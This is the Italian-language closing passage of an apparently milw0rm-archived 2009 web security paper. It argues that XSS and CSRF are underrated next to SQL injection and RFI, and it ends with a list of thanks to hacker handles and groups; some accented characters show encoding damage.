Dopo questo paper spero esauriente, forse inizierete a capire che la gente spesso 

sottovaluta troppo vulnerabilit‡ come XSS & CSRF ..credendo che un SQL o una RFI siano 

migliori, ma senza capire che la dove non sar‡ possibile eseguire una stupida sql su 

index.php?id=[sql] bisogner‡ affidarsi a vulnerabilit‡ pi˘ sottili, che richiedono molta pi˘ 

astuzia ed ingegno.


th4nks to: 

Langy / Xylitol / Nexus / Uber0n / GsC / plucky / Osyris / security-sh3ll / Security Code 

Team / Infernet / R4zor_CrasH / xssed / xssing / DoMin0 /
Inj3ct-it 

# milw0rm.com [2009-08-07]